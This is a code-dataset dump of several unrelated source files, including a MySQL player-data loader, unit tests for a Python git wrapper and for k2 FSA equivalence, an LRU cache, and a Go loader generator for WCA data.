56355c40281c49161566966d5d2b9a09760553bf | d350ecb50abd047d42e2c38d835d6ea8ccb3b787 | /Final_Products/player_bio_info_etl.py | e61cbb9e52cdf17ff034b27f95e5545a211fcf28 | [] | no_license | cs327e-spring2016/TeamCT | da1b93f2fa8e500cdcb0f959efc8c956e1dbd3b1 | 4c87a25cc642808c12e5690257ffb799723e1490 | refs/heads/master | 2021-01-19T12:10:33.196228 | 2016-05-05T00:38:45 | 2016-05-05T00:38:45 | 54,931,440 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,139 | py | import pymysql
def unique_items(players):
    """Return `players` with duplicate people removed, keeping the first row
    seen for each "field0 field1" (first/last name) combination."""
    seen_names = set()
    deduped = []
    for row in players:
        full_name = row[0] + " " + row[1]
        if full_name in seen_names:
            continue
        seen_names.add(full_name)
        deduped.append(row)
    return deduped
# Parse semicolon-separated player rows, dedupe/sort them, assign sequential
# ids, then load them into the TeamCT MySQL database.
# NOTE(review): indentation reconstructed from a flattened dump — verify loop
# bodies; also the DB password is hardcoded ('xx') and the input file handle
# is never closed.
file = open("player_info.txt", "r")
players = []
for line in file:
    line = line.split(";")
    # Strip the trailing newline from the last field.
    line[6] = line[6][:-1]
    players.append(line)
print(len(players))
players = unique_items(players)
players = sorted(players)
player_id = 1
# Prepend a sequential id to each row (reverse/append/reverse == prepend).
for player in players:
    player.reverse()
    player.append(player_id)
    player.reverse()
    player_id += 1
print(players)
# once player array is cleaned up, add to MySQL database 'TeamCT'
conn = pymysql.connect(host='127.0.0.1', user='root', passwd='xx', db='mysql')
cur = conn.cursor()
cur.execute("USE TeamCT")
for player in players:
    cur.execute("INSERT INTO Player_Bio_Info (player_id, lname, fname, position, height, weight, DOB, college) VALUES (%s,%s,%s,%s,%s,%s,%s,%s)", (player[0], player[1], player[2], player[3], player[4], int(player[5]), player[6], player[7]))
    # Commit after every insert — presumably deliberate; batching would be faster.
    cur.connection.commit()
cur.close()
conn.close()
"ronlyleung@yahoo.com"
] | ronlyleung@yahoo.com |
ed5011cc3487f985230c6ed6dd624bc9edd28642 | 898a94058b46ad09e55f220772b74ac9b0d7d249 | /test/test_repo.py | 31e8b686902e5e56550fdc2d69622f87131c4840 | [] | no_license | ndreynolds/pygri | 797d6f541884adead582b9a0230ae1057122aef4 | 239c1ceb8414170f925de9a52a31e666df090bd1 | refs/heads/master | 2016-09-06T04:23:13.987047 | 2011-12-01T06:02:12 | 2011-12-01T06:02:12 | 2,840,397 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,602 | py | from __future__ import with_statement
import unittest
import os
import shutil
import inspect
import uuid
from pygri.repo import Repo, \
NoHeadSet, \
NothingToCommit, \
FILE_IS_UNCHANGED, \
FILE_IS_NEW, \
FILE_IS_MODIFIED, \
FILE_IS_DELETED, \
_expand_ref
from dulwich.objects import Commit, Tree, Blob
from dulwich.errors import NotTreeError
class NoHeadSetTest(unittest.TestCase):
    """Tests the `NoHeadSet` class."""
    def test(self):
        # just make sure it's an exception (Exception appears in its MRO).
        assert Exception in inspect.getmro(NoHeadSet)
class NothingToCommitTest(unittest.TestCase):
    """Tests the `NothingToCommit` class."""
    def test(self):
        # NothingToCommit must also derive from Exception.
        assert Exception in inspect.getmro(NothingToCommit)
class RepoTest(unittest.TestCase):
"""Tests the `Repo` class."""
def setUp(self):
    """Pick a fresh, collision-free path for each test case's repo."""
    # a path to create each test case's repo at.
    self.path = str(uuid.uuid4())
def tearDown(self):
    """Remove the test repo directory, if the test created one."""
    # ``rm -r`` self.path afterwards, if exists.
    if os.path.isdir(self.path):
        shutil.rmtree(self.path)
def test__file_status(self):
    """Tests the `_file_status` method: delete/modify/keep/create one file
    each and check the four status constants are reported."""
    r = self._repo_with_commits()
    basepath = os.path.join(r.root, 'spam-')
    # remove the first one
    os.remove(basepath + '0')
    # edit the second one
    with open(basepath + '1', 'w') as fp:
        fp.write('something else\n\n')
    # new file
    with open(basepath + 'x', 'w') as fp:
        fp.write('new file')
    assert r._file_status('spam-0') == FILE_IS_DELETED
    assert r._file_status('spam-1') == FILE_IS_MODIFIED
    assert r._file_status('spam-2') == FILE_IS_UNCHANGED
    assert r._file_status('spam-x') == FILE_IS_NEW
def test__file_is_modified(self):
    """Tests the `_file_is_modified` method"""
    # TODO: not yet implemented.
    pass
def test__apply_to_tree(self):
    """Tests the `_apply_to_tree` method"""
    # TODO: not yet implemented.
    pass
def test__diff_file(self):
    """Tests the `_diff_file` method"""
    # TODO: not yet implemented.
    pass
def test__file_in_tree(self):
    """Tests the `_file_in_tree` method"""
    r = self._repo_with_commits(4)
    # the spam-0 file is created by the _repo_with_commits method
    assert r._file_in_tree('spam-0')
def test__resolve_ref(self):
    """Tests the `_resolve_ref` method"""
    # TODO: not yet implemented.
    pass
def test__obj_from_tree(self):
    """Tests the `_obj_from_tree` method: a committed file should come back
    from the HEAD tree as a dulwich Blob."""
    r = self._repo_with_commits(4)
    tree = r.object(r.head().tree)
    assert type(r._obj_from_tree(tree, 'spam-0')) is Blob
    # TODO: test subtree retrieval
def test__write_tree_to_wt(self):
    """Tests the `_write_tree_to_wt` method"""
    # TODO: not yet implemented.
    pass
def test_add(self):
    """Tests the `add` method"""
    # TODO: a lot more tests here.
    #
    # Need to verify:
    #   * add path or all
    #   * add only modified
    #   * optionally exclude new files
    r = self._repo_with_commits()

    def in_index(index, path):
        # Linear scan of the dulwich index for `path`.
        for i in index.iteritems():
            if i[0] == path:
                return True
        return False

    # create a new file and add it to index
    # test add path
    self._rand_file('spam-4')
    adds = r.add('spam-4')
    # only 1 file should have been added.
    assert len(adds) == 1
    # is it in the index?
    if not in_index(r.repo.open_index(), 'spam-4'):
        raise KeyError('File not added to index')

    # create another file
    # test add all
    self._rand_file('spam-5')
    r.add(all=True)
    # is it in the index?
    if not in_index(r.repo.open_index(), 'spam-5'):
        raise KeyError('File not added to index')

    # unmodified's shouldn't be add-able.
    adds = r.add('spam-0')
    assert len(adds) == 0

    # we want to make sure that the files get committed as well.
    r.commit(message='test', committer='test')
    assert r._file_in_tree('spam-4')
    assert r._file_in_tree('spam-5')
def test_branch(self):
    """Tests the `branch` method: create branches from HEAD and from an
    explicit commit id without switching away from master."""
    r = self._repo_with_commits()
    # test repo should be on master branch.
    assert r.branch() == 'refs/heads/master'
    # create new branch (from HEAD)
    r.branch('test_branch')
    # is the branch there? does it resolve to the HEAD's commit id?
    assert r.repo.refs['refs/heads/test_branch'] == r.head().id
    # should still be on master (no checkouts)
    assert r.branch() == 'refs/heads/master'
    # create new branch from commit
    #
    # we'll just use HEAD for simplicity's sake, but this time we're
    # supplying a commit.
    r.branch('test_branch2', ref=r.head().id)
    # and do our checks again.
    assert r.repo.refs['refs/heads/test_branch2'] == r.head().id
    assert r.branch() == 'refs/heads/master'
def test_checkout(self):
    """Tests the `checkout` method"""
    r = self._repo_with_commits(3)
    # we'll checkout the parent of HEAD.
    parent = r.object(r.head().parents[0])
    # NOTE(review): checkout is never actually called here — this only
    # asserts the parent resolves to a Commit; the test looks unfinished.
    assert type(parent) is Commit
def test_cmd(self):
    """Tests the `cmd` method"""
    r = self._repo_with_commits()
    # just try a few commands; cmd is expected to return a truthy result.
    assert r.cmd(['status'])
    assert r.cmd(['log', '--pretty=oneline'])
def test_commit(self):
    """Tests the `commit` method"""
    r = Repo.init(self.path, mkdir=True)
    self._rand_file('spam')
    r.add('spam')
    c = r.commit(committer='GOB Bluth', message='Come on!')
    # make sure the commit got set right
    assert type(c) is Commit
    # NOTE(review): `committer=` is asserted via c.author — presumably
    # Repo.commit uses the committer for both fields; confirm.
    assert c.author == 'GOB Bluth'
    assert c.message == 'Come on!'
    # the commit should be the same as the Repo.head
    assert c == r.head()
def test_commits(self):
"""Tests the `commits` method"""
r = self._repo_with_commits(20)
# returns list of Commit objects
assert type(r.commits()) is list
assert type(r.commits()[0]) is Commit
# setting n=20 should get us 20 commits
assert len(r.commits(n=20)) == 20
# NOTE(review): each of the follow-up `r.commits()[0] == r.head()`
# asserts below calls commits() with *no* argument, re-checking the
# default case rather than the SHA/branch/tag result - likely
# intended e.g. `r.commits('master')[0] == r.head()`.
# should accept a SHA
assert r.commits(r.head().id)
assert r.commits()[0] == r.head()
# should accept a branch name
assert r.commits('master')
assert r.commits()[0] == r.head()
# should accept a tag
assert r.commits('v1.0')
assert r.commits()[0] == r.head()
def test_constructor(self):
    """Tests `Repo.__init__` by re-opening an existing repository.

    Also verifies that `head()` on a repository with no commits raises
    NoHeadSet.  Bug fix: the original try/except passed silently when
    no exception was raised at all; an `else` clause now fails the
    test explicitly in that case.
    """
    r1 = Repo.init(self.path, mkdir=True)
    # verify that an existing repository can be initialized
    r2 = Repo(r1.root)
    # make sure it's a Repo object.
    assert type(r2) is Repo
    # a new repo should have no HEAD
    try:
        r2.head()
    except NoHeadSet:
        pass
    else:
        raise AssertionError('head() should raise NoHeadSet on a fresh repo')
def test_diff(self):
"""Tests the `diff` method"""
r = Repo.init(self.path, mkdir=True)
with open(os.path.join(r.root, 'test'), 'w') as fp:
fp.write('hello world')
r.add(all=True)
c1 = r.commit(committer='Test McGee', message='testing diff 1')
with open(os.path.join(r.root, 'test'), 'w') as fp:
fp.write('hello world!')
r.add(all=True)
c2 = r.commit(committer='Test McGee', message='testing diff 2')
# NOTE(review): the expected text resembles difflib context-diff
# output with the filename headers trimmed - presumably Repo.diff
# is built on difflib; confirm before changing this fixture.
expected = \
"""***
---
***************
*** 1 ****
! hello world!
--- 1 ----
! hello world"""
# diff between the two commits, restricted to the 'test' file
result = r.diff(c2.id, c1.id, 'test')
assert result == expected
def test_head(self):
"""Tests the `head` method"""
r = self._repo_with_commits(3)
head = r.head()
# make sure it returns a commit
assert type(head) is Commit
# in this case, the most recent commit should have the message:
# (_repo_with_commits numbers messages from 0, so the third is 'Commit 2')
assert head.message == 'Commit 2'
def test_init(self):
"""Tests the `init` classmethod (repository creation)."""
# NOTE init refers not to __init__, but the classmethod for creating
# repositories. See test_constructor() for __init__.
r = Repo.init(self.path, mkdir=True)
# make sure it created something.
assert os.path.isdir(self.path)
# does the dir have a .git?
# (i.e. a non-bare repository was created)
assert os.path.isdir(os.path.join(self.path, '.git'))
# make sure it returns a Repo object.
assert type(r) is Repo
def test_object(self):
"""Tests the `object` method"""
r = self._repo_with_commits()
tree = r.head().tree
commit = r.head().id
# `object` should resolve an id to the appropriately-typed object.
assert type(r.object(tree)) is Tree
assert type(r.object(commit)) is Commit
def test_tag(self):
"""Tests the `tag` method"""
r = self._repo_with_commits()
r.tag('test')
# the tag should show up as a loose ref file under .git/refs/tags
tags_dir = os.path.join(self.path, '.git', 'refs', 'tags')
assert 'test' in os.listdir(tags_dir)
def test_tree(self):
    """Tests the `tree` method.

    Bug fix: previously, if `tree()` accepted a commit id and returned
    a Tree, the test passed silently.  An `else` clause now fails the
    test whenever NotTreeError is not raised.
    """
    r = self._repo_with_commits()
    # grab the tree from the HEAD commit
    t = r.tree(r.head().tree)
    # is it a tree?
    assert type(t) is Tree
    # giving it a commit id (not a tree id) must raise NotTreeError.
    try:
        r.tree(r.head().id)
    except NotTreeError:
        pass
    else:
        raise AssertionError('tree() should raise NotTreeError for a commit id')
def _rand_file(self, path):
"""Write a random UUID string to *path* (helper for unique file content).

Note: despite the historical name, this writes a uuid4, not a SHA1.
"""
with open(os.path.join(self.path, path), 'w') as fp:
fp.write(str(uuid.uuid4()))
def _repo_with_commits(self, num_commits=1):
"""
Returns a repo with one or more commits, on master branch, with
a tag 'v1.0' that points to the last commit.
Commit messages are 'Commit 0' .. 'Commit num_commits-1'.
"""
r = Repo.init(self.path, mkdir=True)
for c in range(num_commits):
# each commit rewrites the same four files with fresh random content
for i in range(4):
self._rand_file('spam-%d' % i)
# add the files/changes
r.add(all=True)
# commit the changes
r.commit(committer='Joe Sixpack', message='Commit %d' % c)
r.tag('v1.0')
return r
def test__expand_ref():
    """Tests the `_expand_ref` function."""
    # Every spelling of the ref should expand to the same canonical form.
    for given in ('refs/heads/master', 'heads/master', 'master'):
        assert _expand_ref('heads', given) == 'refs/heads/master'
if __name__ == '__main__':
unittest.main()
| [
"ndreynolds@gmail.com"
] | ndreynolds@gmail.com |
b96cdb37e177f57c6ce552c428b42910fcde0a6a | 92dd4dff04d4682967b60d6825482b9cca7e4796 | /python-samples/regex-match.py | f3a026fe0f8664167fab1f1e4d78c0aaf2c527ed | [] | no_license | vigneshmahesh/big-data-pipeline | 806868f959413d897e4a12bc2349b6ef0f1bcdfb | 928815a3983fce7500533ae5f468699c5e5fd4d3 | refs/heads/master | 2023-07-08T06:17:19.252901 | 2021-05-02T18:57:49 | 2021-05-02T18:57:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 621 | py | #https://stackoverflow.com/questions/8888567/match-a-line-with-multiple-regex-using-python
import re
stri="hello hella hellb hellc helld"
regexList = ["hella", "hellb", "hellc"]
gotMatch = False
for regex in regexList:
s = re.search(regex,stri)
if s:
gotMatch = True
break
if gotMatch:
print("got match")
regexes= 'quick', 'brown', 'fox'
combinedRegex = re.compile('|'.join('(?:{0})'.format(x) for x in regexes))
lines = 'The quick brown fox jumps over the lazy dog', 'Lorem ipsum dolor sit amet', 'The lazy dog jumps over the fox'
for line in lines:
print(combinedRegex.findall(line))
| [
"noreply@github.com"
] | vigneshmahesh.noreply@github.com |
d329e0df524f7bf2d61bdfb4ee8f5c750109dcbf | ac74496d58e25060cc12bfd07f3fbcf3a790b575 | /bin/wheel | d62162fcda35324b1672ebf6978b50e65e4a1876 | [] | no_license | prdiction47/tryTen-Django-template | 2b8e18047bb16b97dc7f0c8be92015e3b47873bd | b78fcc45631c47194d613c9590c902bf09cf217f | refs/heads/master | 2022-02-06T11:55:21.526535 | 2019-07-20T20:01:43 | 2019-07-20T20:01:43 | 197,975,578 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 233 | #!/home/p37/tryTen/activate/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from wheel.tool import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"noreply@github.com"
] | prdiction47.noreply@github.com | |
35fddb176546bcdc04b5f7168fe7656d9d16c1c5 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02675/s648199301.py | b63ed0e3bb4be52116a50e76ac3fe5f3864781f1 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 332 | py | # -*- coding: utf-8 -*-
def main():
    """Read N and print the counter word determined by its last digit."""
    N = int(input())
    # The reading depends only on the final decimal digit of N.
    last_digit = N % 10
    if last_digit == 3:
        ans = 'bon'
    elif last_digit in (0, 1, 6, 8):
        ans = 'pon'
    else:  # 2, 4, 5, 7, 9
        ans = 'hon'
    print(ans)
if __name__ == "__main__":
main() | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
fbb22d07d9835c8d6caf030863e2810b22a5435c | 43a8517e548eedbd8e5b74297207a794c63c5c0d | /examplePrintNameReverse.py | a797e4c755d3c64ea1348808c6fca356cf7aff2a | [] | no_license | JaleelSavoy/CS6.0001 | 7842bd22dad1f93ec18b3e60636f5acc0ba653b7 | ca9a0ae2afd18bcf476de1091a402341d053be51 | refs/heads/master | 2021-01-19T21:21:34.417329 | 2017-04-22T19:53:28 | 2017-04-22T19:53:28 | 88,646,408 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 272 | py | #print name example
def printName(firstName, lastName, reverse=False):
    """Print a name, optionally in "Last, First" order.

    :param firstName: given name
    :param lastName: family name
    :param reverse: when True, print "lastName, firstName"
    :return: the formatted string (also printed), so callers can reuse it

    Bug fix: the reversed form previously printed "Last,First" with no
    space after the comma, contradicting the documented example output
    below ("Savoy, Jaleel").
    """
    if reverse:
        formatted = lastName + ", " + firstName
    else:
        formatted = firstName + " " + lastName
    print(formatted)
    return formatted
# printName('Jaleel', 'Savoy', True)
# prints: Savoy, Jaleel
| [
"noreply@github.com"
] | JaleelSavoy.noreply@github.com |
2eceaf1c444d32ea302bb66c18aa3323860897b4 | 507103d591ed6993203db92fd8dffc992e8bcd5c | /k2/python/host/tests/fsa_equivalent_test.py | c328246c581ba7fda7ed9cc2746d8e53fc9b4e4a | [
"Apache-2.0"
] | permissive | k2-fsa/k2 | 6e661bd505f06583af779f4249bbb8ea87a0d662 | 2b2ac14b326d61d79d04e53fbd69b1ff6d630411 | refs/heads/master | 2023-09-03T11:57:13.505432 | 2023-08-23T21:58:26 | 2023-08-23T21:58:26 | 256,463,281 | 851 | 192 | Apache-2.0 | 2023-08-26T06:51:21 | 2020-04-17T09:44:05 | Cuda | UTF-8 | Python | false | false | 8,722 | py | #!/usr/bin/env python3
#
# Copyright 2020 Xiaomi Corporation (author: Haowen Qiu)
#
# See ../../../LICENSE for clarification regarding multiple authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# To run this single test, use
#
# ctest --verbose -R host_fsa_equivalent_test_py
#
import unittest
import torch
import k2host
class TestIsFsaEquivalent(unittest.TestCase):
    """Equivalence checks for unweighted FSAs via k2host.is_rand_equivalent.

    Bug fix: this class previously defined two methods both named
    `test_bad_case_2`; Python silently keeps only the last definition,
    so the first never ran.  The second occurrence actually asserts that
    the two FSAs *are* equivalent, so it is renamed `test_good_case_3`.
    """

    def test_bad_case_1(self):
        # just set arc.weight as 0 since we won't use it here
        s_a = r'''
0 1 1 0
0 2 2 0
1 2 3 0
1 3 4 0
2 3 5 0
3
'''
        fsa_a = k2host.str_to_fsa(s_a)
        s_b = r'''
0 1 1 0
0 2 2 0
1 2 3 0
3
'''
        fsa_b = k2host.str_to_fsa(s_b)
        self.assertFalse(k2host.is_rand_equivalent(fsa_a, fsa_b))

    def test_bad_case_2(self):
        s_a = r'''
0 1 1 0
0 2 2 0
1 2 3 0
1 3 4 0
2 3 5 0
3
'''
        fsa_a = k2host.str_to_fsa(s_a)
        s_b = r'''
0 1 1 0
0 2 2 0
1 2 3 0
1 3 4 0
2 3 6 0
3
'''
        fsa_b = k2host.str_to_fsa(s_b)
        self.assertFalse(k2host.is_rand_equivalent(fsa_a, fsa_b, 100))

    def test_good_case_1(self):
        # both fsas will be empty after trimming
        s_a = r'''
0 1 1 0
0 2 2 0
1 2 3 0
3
'''
        fsa_a = k2host.str_to_fsa(s_a)
        s_b = r'''
0 1 1 0
0 2 2 0
3
'''
        fsa_b = k2host.str_to_fsa(s_b)
        self.assertTrue(k2host.is_rand_equivalent(fsa_a, fsa_b))

    def test_good_case_2(self):
        # same fsas
        s_a = r'''
0 1 1 0
0 2 2 0
1 2 3 0
1 3 4 0
2 3 5 0
3 4 -1 0
4
'''
        fsa_a = k2host.str_to_fsa(s_a)
        self.assertTrue(k2host.is_rand_equivalent(fsa_a, fsa_a))

    def test_good_case_3(self):
        # Renamed from a duplicate `test_bad_case_2` (see class docstring);
        # the assertion expects the two FSAs to be equivalent, so this is
        # in fact a "good" case.
        s_a = r'''
0 1 1 0
0 2 2 0
0 3 8 0
1 4 4 0
2 4 5 0
4 5 -1 0
5
'''
        fsa_a = k2host.str_to_fsa(s_a)
        s_b = r'''
0 2 1 0
0 1 2 0
0 3 9 0
1 4 5 0
2 4 4 0
4 5 -1 0
5
'''
        fsa_b = k2host.str_to_fsa(s_b)
        self.assertTrue(k2host.is_rand_equivalent(fsa_a, fsa_b))
class TestIsWfsaRandEquivalent(unittest.TestCase):
def setUp(self):
s_a = r'''
0 1 1 2
0 1 2 2
0 1 3 3
0 2 4 3
0 2 5 1
1 3 5 3
1 3 6 2
2 4 5 5
2 4 6 4
3 5 -1 1
4 5 -1 3
5
'''
self.fsa_a = k2host.str_to_fsa(s_a)
s_b = r'''
0 1 1 5
0 1 2 5
0 1 3 6
0 1 4 10
0 1 5 8
1 2 5 1
1 2 6 0
2 3 -1 0
3
'''
self.fsa_b = k2host.str_to_fsa(s_b)
s_c = r'''
0 1 1 5
0 1 2 5
0 1 3 6
0 1 4 10
0 1 5 9
1 2 5 1
1 2 6 0
2 3 -1 0
3
'''
self.fsa_c = k2host.str_to_fsa(s_c)
def test_max_weight(self):
self.assertTrue(
k2host.is_rand_equivalent_max_weight(self.fsa_a, self.fsa_b))
self.assertFalse(
k2host.is_rand_equivalent_max_weight(self.fsa_a, self.fsa_c))
def test_logsum_weight(self):
self.assertTrue(
k2host.is_rand_equivalent_logsum_weight(self.fsa_a, self.fsa_b))
self.assertFalse(
k2host.is_rand_equivalent_logsum_weight(self.fsa_a, self.fsa_c))
def test_with_beam(self):
self.assertTrue(
k2host.is_rand_equivalent_max_weight(self.fsa_a, self.fsa_b, 4.0))
self.assertFalse(
k2host.is_rand_equivalent_max_weight(self.fsa_a, self.fsa_c, 6.0))
class TestRandPath(unittest.TestCase):
def test_bad_case_1(self):
# empty fsa
array_size = k2host.IntArray2Size(0, 0)
fsa = k2host.Fsa.create_fsa_with_size(array_size)
rand_path = k2host.RandPath(fsa, False)
array_size = k2host.IntArray2Size()
rand_path.get_sizes(array_size)
path = k2host.Fsa.create_fsa_with_size(array_size)
arc_map = k2host.IntArray1.create_array_with_size(array_size.size2)
status = rand_path.get_output(path, arc_map)
self.assertFalse(status)
self.assertTrue(k2host.is_empty(path))
self.assertTrue(arc_map.empty())
def test_bad_case_2(self):
# non-connected fsa
s_a = r'''
0 1 1 0
0 2 2 0
1 3 4 0
4
'''
fsa = k2host.str_to_fsa(s_a)
rand_path = k2host.RandPath(fsa, False)
array_size = k2host.IntArray2Size()
rand_path.get_sizes(array_size)
path = k2host.Fsa.create_fsa_with_size(array_size)
arc_map = k2host.IntArray1.create_array_with_size(array_size.size2)
status = rand_path.get_output(path, arc_map)
self.assertFalse(status)
self.assertTrue(k2host.is_empty(path))
self.assertTrue(arc_map.empty())
def test_good_case_1(self):
s_a = r'''
0 1 1 0
0 2 2 0
1 2 3 0
2 3 4 0
2 4 5 0
3 4 7 0
4 5 9 0
5 6 -1 0
6
'''
fsa = k2host.str_to_fsa(s_a)
rand_path = k2host.RandPath(fsa, False)
array_size = k2host.IntArray2Size()
rand_path.get_sizes(array_size)
path = k2host.Fsa.create_fsa_with_size(array_size)
status = rand_path.get_output(path)
self.assertTrue(status)
self.assertFalse(k2host.is_empty(path))
def test_good_case_2(self):
s_a = r'''
0 1 1 0
1 2 3 0
2 3 4 0
3 4 -1 0
4
'''
fsa = k2host.str_to_fsa(s_a)
rand_path = k2host.RandPath(fsa, False)
array_size = k2host.IntArray2Size()
rand_path.get_sizes(array_size)
path = k2host.Fsa.create_fsa_with_size(array_size)
arc_map = k2host.IntArray1.create_array_with_size(array_size.size2)
status = rand_path.get_output(path, arc_map)
self.assertTrue(status)
self.assertFalse(k2host.is_empty(path))
self.assertFalse(arc_map.empty())
expected_arc_indexes = torch.IntTensor([0, 1, 2, 3, 4, 4])
expected_arcs = torch.IntTensor([[0, 1, 1, 0], [1, 2, 3, 0],
[2, 3, 4, 0], [3, 4, -1, 0]])
expected_arc_map = torch.IntTensor([0, 1, 2, 3])
self.assertTrue(torch.equal(path.indexes, expected_arc_indexes))
self.assertTrue(torch.equal(path.data, expected_arcs))
self.assertTrue(torch.equal(arc_map.data, expected_arc_map))
def test_eps_arc_1(self):
s_a = r'''
0 1 1 0
0 2 0 0
1 2 3 0
2 3 0 0
2 4 5 0
3 4 7 0
4 5 9 0
5 6 -1 0
6
'''
fsa = k2host.str_to_fsa(s_a)
rand_path = k2host.RandPath(fsa, True)
array_size = k2host.IntArray2Size()
rand_path.get_sizes(array_size)
path = k2host.Fsa.create_fsa_with_size(array_size)
arc_map = k2host.IntArray1.create_array_with_size(array_size.size2)
status = rand_path.get_output(path, arc_map)
self.assertTrue(status)
self.assertFalse(k2host.is_empty(path))
self.assertFalse(arc_map.empty())
def test_eps_arc_2(self):
# there is no epsilon-free path
s_a = r'''
0 1 1 0
0 2 0 0
1 2 3 0
2 3 0 0
3 5 7 0
3 4 8 0
4 5 9 0
5 6 -1 0
6
'''
fsa = k2host.str_to_fsa(s_a)
rand_path = k2host.RandPath(fsa, True)
array_size = k2host.IntArray2Size()
rand_path.get_sizes(array_size)
path = k2host.Fsa.create_fsa_with_size(array_size)
arc_map = k2host.IntArray1.create_array_with_size(array_size.size2)
status = rand_path.get_output(path, arc_map)
self.assertFalse(status)
self.assertTrue(k2host.is_empty(path))
self.assertTrue(arc_map.empty())
if __name__ == '__main__':
unittest.main()
| [
"noreply@github.com"
] | k2-fsa.noreply@github.com |
96a1d7b58328b30fde41e93d4831caca9bf6fc36 | 9aaa39f200ee6a14d7d432ef6a3ee9795163ebed | /Algorithm/Python/146. LRU Cache.py | 12ae61d680fa056cf718b935addad161d26c1efe | [] | no_license | WuLC/LeetCode | 47e1c351852d86c64595a083e7818ecde4131cb3 | ee79d3437cf47b26a4bca0ec798dc54d7b623453 | refs/heads/master | 2023-07-07T18:29:29.110931 | 2023-07-02T04:31:00 | 2023-07-02T04:31:00 | 54,354,616 | 29 | 16 | null | null | null | null | UTF-8 | Python | false | false | 1,259 | py | # -*- coding: utf-8 -*-
# @Author: WuLC
# @Date: 2016-08-04 22:39:03
# @Last modified by: WuLC
# @Last Modified time: 2016-08-04 22:40:49
# @Email: liangchaowu5@gmail.com
class LRUCache(object):
    """Least-recently-used cache with O(1) get/set.

    Improvement: the original implementation kept a deque of keys and
    called `deque.remove(key)` on every hit, which is O(n) per access.
    A `collections.OrderedDict` preserves the same recency order (oldest
    entry first) with O(1) `move_to_end` / `popitem` operations.  The
    public interface (constructor, `get`, `set`) is unchanged.
    """

    def __init__(self, capacity):
        """
        :type capacity: int
        """
        self.capacity = capacity
        # key -> value, ordered from least to most recently used
        self.cache = collections.OrderedDict()

    def get(self, key):
        """Return the cached value for ``key``, or -1 if absent.

        :rtype: int
        """
        if key not in self.cache:
            return -1
        # Mark as most recently used.
        self.cache.move_to_end(key)
        return self.cache[key]

    def set(self, key, value):
        """Insert or update ``key``; evict the LRU entry when full.

        :type key: int
        :type value: int
        :rtype: nothing
        """
        if key in self.cache:
            # Updating an existing key refreshes its recency.
            self.cache.move_to_end(key)
        elif len(self.cache) == self.capacity:
            # Evict the least recently used entry (front of the dict).
            self.cache.popitem(last=False)
        self.cache[key] = value
| [
"liangchaowu5@gmail.com"
] | liangchaowu5@gmail.com |
c375cdd6d18f800c809abea55b624924512fcece | 3b795f932efde9ad1c9fb84eeeb3d2b98bbccd2c | /generate_loader.py | cb4cc0604408aa9a6496225989db9d778c14840b | [] | no_license | pochmann/wca-api-go | f5c3927728001920ffeeb208b50d7bb8eb33de81 | 537f36840721244d4836f414c2f99019c99a9d2d | refs/heads/master | 2020-05-17T00:51:16.004945 | 2015-02-14T17:17:11 | 2015-02-14T17:17:11 | 30,503,233 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,929 | py | from glob import glob
from os.path import join
import re, subprocess
# Analyze the types in the .tsv files
types = []
for path in sorted(glob(join('data', 'WCA_export_*.tsv'))):
tablename = re.search('export_(.*).tsv', path).group(1)
typename = 'Wca' + re.sub('ies$', 'y', tablename).rstrip('s')
varname = 'wca' + tablename
with open(path, encoding='utf-8') as tf:
# Determine the column types (int or string)
fieldnames = next(tf).strip().split('\t')
fieldtypes = ['int32'] * len(fieldnames)
for row in tf:
for i, value in enumerate(row.strip().split('\t')):
if fieldtypes[i] == 'int32':
try:
int(value)
except:
fieldtypes[i] = 'str32'
types.append((typename, varname, fieldnames, fieldtypes, tablename))
# Generate the .go file
with open('wca-data.go', 'w') as f:
def p(*stuff):
print(*stuff, file=f)
# Output the package header
p('// This code was generated by generate_loader.py and should not be edited.')
p('package main')
p('import ("bufio"\n"os"\n"path"\n"strings")')
# Output the variable declarations
for typename, varname, fieldnames, fieldtypes, tablename in types:
p('var ' + varname + ' ' + '[]' + typename)
# Output the type declarations
for typename, varname, fieldnames, fieldtypes, tablename in types:
p('type %s struct {' % typename)
for fieldname, fieldtype in zip(fieldnames, fieldtypes):
p('{} {} `json:"{}"`'.format(fieldname[0].upper() + fieldname[1:], fieldtype, fieldname))
p('}')
# Output the loading code
p('func LoadWcaData() {')
p('var file *os.File')
p('var scanner *bufio.Scanner')
p('var ctr int')
for typename, varname, fieldnames, fieldtypes, tablename in types:
# Setup-code
p('''\n// Open the file, count the data rows, prepare the scanner
file, _ = os.Open(path.Join("data", "WCA_export_{tablename}.tsv"))
defer file.Close()
scanner = bufio.NewScanner(file)
ctr = -1
for scanner.Scan() {{
ctr++
}}
file.Seek(0, 0)
scanner = bufio.NewScanner(file)
scanner.Scan()
// Load the data
{varname} = make([]{typename}, ctr)
for i := range {varname} {{
scanner.Scan()
row := strings.Split(scanner.Text(), "\\t")'''.format(tablename=tablename, varname=varname, typename=typename))
# Code for loading the fields
p('x := &' + varname + '[i]')
i = 0
for fieldname, fieldtype in zip(fieldnames, fieldtypes):
p('x.{} = get{}(row[{}])'.format(fieldname[0].upper() + fieldname[1:], fieldtype.title(), i))
i += 1
# Close the loop
p('}')
p('}')
# Format the generated code
subprocess.call(['gofmt', '-w', 'wca-data.go'])
| [
